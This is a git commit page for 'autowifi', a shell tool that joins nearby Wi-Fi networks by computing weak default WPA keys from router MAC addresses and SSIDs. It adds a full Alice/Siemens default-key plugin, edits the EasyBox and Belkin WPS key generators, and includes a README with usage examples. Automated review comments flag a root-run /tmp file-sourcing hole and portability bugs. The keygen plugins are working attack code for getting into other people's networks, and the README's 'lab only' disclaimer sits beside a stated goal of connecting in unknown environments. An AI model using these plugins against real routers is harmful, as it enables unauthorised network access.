author | lassulus <lassulus@googlemail.com> | 2013-06-30 14:25:29 +0200 |
---|---|---|
committer | lassulus <lassulus@googlemail.com> | 2013-06-30 14:25:29 +0200 |
commit | af1d85fa6b390f8119c4ba695b3f075bd726806e (patch) | |
tree | 922822531854bfe6caf4a08e2b13a3cd400aade9 | |
parent | 1d591aa1f4af30f41f2d44656d5b86e73048cffd (diff) | |
parent | b99bbe256c030cec78b1c96d08eb02860dda911c (diff) |
Merge branch 'master' of github.com:krebscode/autowifi
-rw-r--r-- | README.md | 49 | ||||
-rwxr-xr-x | usr/bin/autowifi | 8 | ||||
-rwxr-xr-x | usr/bin/autowifi_dryrun | 42 | ||||
-rw-r--r-- | usr/lib/autowifi/lib/plugin_core | 26 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/02alice | 20 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/02easybox | 19 | ||||
-rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 9 |
7 files changed, 122 insertions, 51 deletions
diff --git a/README.md b/README.md
new file mode 100644
index 00000000..3e0d8dce
--- /dev/null
+++ b/README.md
@@ -0,0 +1,49 @@
+# Autowifi
+Author: makefu,lassulus
+
+Status: Pre-Alpha - it will most likely break if you try to use it
+
+# Contact
+
+twitter: @krebsbob ,@makefoo
+
+IRC: freenode #krebs
+
+# Goals
+Goal of autowifi is to provide a tool which automatically can connect to
+networks in an unknown environment.
+
+This can either be done by connecting to open networks, known networks
+(whitelist) or by calculating weak default wpa keys (for example easybox
+default passwords).
+
+# Audience
+Due to the current status of the project the target audience are
+linux users with technical background .
+
+# Usage
+
+ # all as root
+ # try to find networks to connect to around you
+ usr/bin/autowifi_dryrun quiet
+
+ # start the autowifi daemon which tries to stay in networks all the time
+ usr/bin/autowifi
+
+# Plugins
+All tests to open up networks are implemented in plugins in
+ usr/lib/autowifi/plugins
+
+## Run a single Plugin
+This can be used for testing purposes, e.g. test a single plugin against given networks directly
+
+ # try out the easybox keygen
+ usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style)
+
+ #e.g.
+ usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]"
+
+# Disclaimer
+- use at own risk
+- only run in lab environment
+- you break it, you buy it
diff --git a/usr/bin/autowifi b/usr/bin/autowifi
index 5d9cad16..07786d67 100755
--- a/usr/bin/autowifi
+++ b/usr/bin/autowifi
@@ -63,7 +63,6 @@ find_count_of_ssid(){
 connect_to_network_by_ssid(){
- wifi_init
 find_count_of_ssid "$1" | (while read i
 do
 loop_over_cracks "$i" && exit 0
@@ -76,7 +75,6 @@ connect_to_network_by_ssid(){
 }
 connect_with_pw(){
- wifi_init
 find_count_of_ssid "$1" | (while read i
 do
 KEY="$2"
@@ -92,8 +90,8 @@ wifi_init(){
 . /tmp/${interface}.scan
 }
 loop_over_networks(){
- wifi_init
+ wifi_init
 for i in `seq 1 $WIFI_COUNT`; do
 loop_over_cracks "$i"
 if [ $? -eq 0 ]; then
@@ -159,9 +157,7 @@ loop_cracks_over_networks(){
 # exit 0
 #}
-
-
-
+wifi_init
 if [ -n "$2" ]; then
 echo connecting to $1 with pw $2
 connect_with_pw "$1" "$2"
diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun
index 1df94119..c9867106 100755
--- a/usr/bin/autowifi_dryrun
+++ b/usr/bin/autowifi_dryrun
@@ -2,30 +2,23 @@
 # ENV:
 # the root directory (e.g. root=$PWD/../../ if run from here )
 cd $(dirname $(readlink -f $0))
-root=${root:-/}
-wifi=${wifi:-wlan0}
-
 test "${1:-}" = 'quiet' && exec 2>&-
-# for iwlist_scan
-. $root/usr/lib/autowifi/lib/iwlist
+interface=${interface:-wlan0}
+root=${root:-../../}
+crackdir=$root/usr/lib/autowifi/plugins
+wifi_keys=$root/etc/autowifi/wifi_keys
+wifi_log=$root/var/log/autowifi.log
-# . $ROOT/usr/lib/autowifi/lib/
+# exists() run_hooks()
+. $root/usr/lib/autowifi/lib/core
-# for check_internet and check_gateway
-# . /usr/lib/autowifi/lib/network
+# start_wpa_supplicant()
+. $root/usr/lib/autowifi/lib/wpa_supplicant
 crack_wifi(){
- #SSID MAC CHANNEL ENCRYPTION WPA WPA2
- if [ "$4" == off ];then
- encr=open
- elif [ "$6" -eq 1 ]; then
- encr=psk2
- elif [ "$5" -eq 1 ]; then
- encr=psk
- elif [ "$4" == on ]; then
- encr=wep
- fi
+ #SSID MAC FREQ ENCRYPTION + ALL_RET=1
 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do
 printf "%s" "Trying $(basename $hack) against $1 : " >&2
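Review bot: `crackdir` is introduced on the new side, but `crack_wifi` still spells the plugin directory out in `for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do`, so the new variable is dead and the two paths can drift apart; `for hack in $(find "$crackdir" -type f | sort -n); do` uses it and quotes the expansion. `$root` now defaults to the relative `../../`, resolved against the `cd` above, so the two `. $root/usr/lib/autowifi/lib/...` lines should quote it as well. `wifi_keys` and `wifi_log` are also unused within this hunk; if the sourced `core` library consumes them, that is not visible here. crack_wifi's body continues outside the hunk.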
@@ -41,13 +34,18 @@ crack_wifi(){
 done
 return $ALL_RET
 }
+wifi_init(){
+ wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant
+ wifi_scan > /tmp/${interface}.scan
+ . /tmp/${interface}.scan
+}
 loop_over_networks(){
- . /tmp/${wifi}.scan
- echo "SSID:MAC:CHANNEL:ENCRYPTION:key"
+ wifi_init
+
+ echo "SSID:MAC:FREQ:ENCRYPTION:key"
 for i in `seq 1 $WIFI_COUNT`; do
- eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}}
+ eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${FREQ_${i}} \${ENCRYPTION_${i}}
 done
 }
-iwlist_scan > /tmp/${wifi}.scan
 loop_over_networks
diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core
index da003350..1b83b0c3 100644
--- a/usr/lib/autowifi/lib/plugin_core
+++ b/usr/lib/autowifi/lib/plugin_core
@@ -1,24 +1,38 @@
+#!/bin/sh
 parse_plugin_args(){
 [ $# -ne 4 ] && plugin_usage && exit 1
 # convenience function to put args in ENV variables
 ESSID="$1"
- MAC="$2"
+
+ # mac is returned without colon
+ MAC=$(printf "%s" "$2" | sed 's/://g')
+ # split up the mac address to vendor and private part
+ VENDOR_MAC=${MAC:0:6}
+ PRIVATE_MAC=${MAC:6:12}
 CHANNEL="$3"
 ENC="$4"
- if [ ${#MAC} -ne 17 ] ;then
+ if [ ${#MAC} -ne 12 ] ;then
 echo "MAC malformed"
 exit 1
 fi
 }
 plugin_usage(){
 cat << EOF
-usage: $0 ESSID MAC CHANNEL ENC WPA WPA2"
+usage: $0 ESSID MAC CHANNEL ENC"
 ESSID - string
 MAC - 00:11:22:33:44:55
- ENC - on | off
- WPA - 0 | 1
- WPA2 - 0 | 1
+ CHANNEL - 4
+ ENC - wpa
 EOF
 }
+
+check_vendor_mac(){
+ needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+ shift
+ for i in "$@";do
+ [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+ done
+ return 1
+}
diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice
new file mode 100755
index 00000000..1b4533a4
--- /dev/null
+++ b/usr/lib/autowifi/plugins/02alice
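Review bot: The new `wifi_init` writes the scan to the fixed path `/tmp/${interface}.scan` and then sources it as shell code; the README on this page says the tool runs as root, so a file or symlink of that name left in /tmp by another local user means root either clobbers whatever the link points at or executes that user's text instead of its own scan output. `scan=$(mktemp) || exit 1` with `trap 'rm -f -- "$scan"' EXIT`, then `wifi_scan > "$scan"` and `. "$scan"`, removes the predictable name; the same `. /tmp/${interface}.scan` is kept as context in the `wifi_init` hunk of `usr/bin/autowifi`, and `/tmp/autowifi.wpa_supplicant` on the first new line is a fixed path of the same kind. Whether `wifi_scan` shell-quotes the `ESSID_n` values it emits is not visible here, but since the file is sourced, that quoting alone decides whether a network name received over the air is treated as data or as code, so it deserves the same review.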
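Review bot: `+#!/bin/sh` is added at the top of plugin_core, and the plugins that source it (`02alice`, `02easybox`) carry the same shebang, but this hunk introduces `${MAC:0:6}`, `${MAC:6:12}` and `==` inside `[ ]`, which are bash extensions that dash — `/bin/sh` on Debian-family systems — rejects ("Bad substitution" / "unexpected operator"); either change the shebangs to `#!/bin/bash` or use POSIX forms such as `VENDOR_MAC=$(printf '%s' "$MAC" | cut -c1-6)`. The same substring form appears in the new `02alice` hunk (`${TMP:0:12}`) and the `02easybox` hunk (`${MAC:8:4}`). In `check_vendor_mac`, `printf $1` and `printf $i` pass the argument as the format string, so a `%` in it is interpreted and the value is word-split; `printf '%s' "$1"` and `printf '%s' "$i"`. `[ ${#MAC} -ne 12 ]` still accepts non-hex characters after the colons are stripped, which the arithmetic `$((0x${MAC}-1))` in `02alice` then fails on; `case $MAC in *[!0-9A-Fa-f]*) echo "MAC malformed"; exit 1;; esac` next to the length check closes that.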
@@ -0,0 +1,20 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from
+# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) )
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox
index 2126e17c..3d7cb8c1 100755
--- a/usr/lib/autowifi/plugins/02easybox
+++ b/usr/lib/autowifi/plugins/02easybox
@@ -1,21 +1,20 @@
 #!/bin/sh
 #ESSID MAC CHANNEL ENCRYPTION WPA WPA2
-if ! echo "$1" | egrep -qi "(EasyBox-|Arcor-|Vodafone-)"; then
- exit 1
-else
- MAC=${2?\$2 must be MAC}
- # Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal.
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+parse_plugin_args "$@"
- take5=${MAC:12}
- last4=${take5/:/}
+if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then
+ echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone"
+ exit 1
+else
 # Fill up to 4 places with zeros, if necessary:
- deci=$(printf "%04d" "0x$last4" | sed 's/.*\(....\)/\1/;s/./& /g')
- #echo M4: ${deci[@]}
+ deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
 #
 # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
- hexi=$(echo ${MAC:12:5} | sed 's/://;s/./& /g')
+ hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
 #echo 'M4 (Hex): ' ${hexi[@]}
 # K1 = last byte of (d0 + d1 + h2 + h3)
 # K2 = last byte of (h0 + h1 + d2 + d3)
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 82140523..65e08624 100755
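Review bot: The new `if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then` hands a string that arrives from the network to echo, whose handling of values like `-n` or `-e` differs between bash and dash, and it trades the previous `-q` for a redirect while keeping the deprecated `egrep`; `printf '%s\n' "$ESSID" | grep -qiE '(EasyBox-|Arcor-|Vodafone-)'` is the portable form with the same match. The context comment `#ESSID MAC CHANNEL ENCRYPTION WPA WPA2` on line 2 now disagrees with `parse_plugin_args`, which exits unless exactly four arguments are given, so it should read `#ESSID MAC CHANNEL ENCRYPTION`. The if/else block continues outside the hunk.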
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0))
 . ../lib/wps
 parse_plugin_args "$@"
-MAC=$(printf "%s" $MAC| sed 's/://g')
-VENDOR_MAC=${MAC:0:6}
-PRIVATE_MAC=${MAC:6:12}
-if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
- echo "VENDOR MAC $VENDOR_MAC not affected"
- exit 1
-fi
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
 calc_belkin(){
 PRIVATE_MAC=${1}